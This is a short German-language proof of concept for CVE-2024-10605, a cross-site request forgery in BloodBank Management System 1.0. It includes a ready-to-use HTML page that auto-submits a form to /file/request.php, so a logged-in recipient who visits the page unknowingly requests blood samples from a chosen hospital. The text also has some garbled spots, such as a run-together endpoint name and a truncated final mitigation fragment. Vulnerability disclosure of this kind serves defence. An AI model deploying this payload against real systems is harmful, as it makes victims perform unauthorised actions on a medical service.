
Proof-of-Concept für CVE-2024-10605, eine CSRF-Schwachstelle in BloodBank Management System 1.0, die unbefugte Blutprobenanfragen ermöglicht.
file/request.phpAuf diesem Endpunkt /file/request.php liegt eine Cross-Site-Request-Forgery vor, die es einem entfernten Benutzer ermöglicht, im Namen eines eingeloggten Empfängers eine Blutproben-Anfrage aus den verfügbaren Blutproben eines ausgewählten Krankenhauses zu initiieren.
Eine erfolgreiche Ausnutzung kann zu unbefugten Aktionen im Namen des Opfers führen. Darüber hinaus kann dies durch Besuch bösartiger Websites mit dem Payload ausgenutzt werden.
Nachfolgend ein Beispiel eines CSRF-PoC-Angriffs, der eine Blutproben-Anfrage von einem eingeloggten Empfängerkonto initiiert:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
csrf-Token in Ihre Anfrage ein.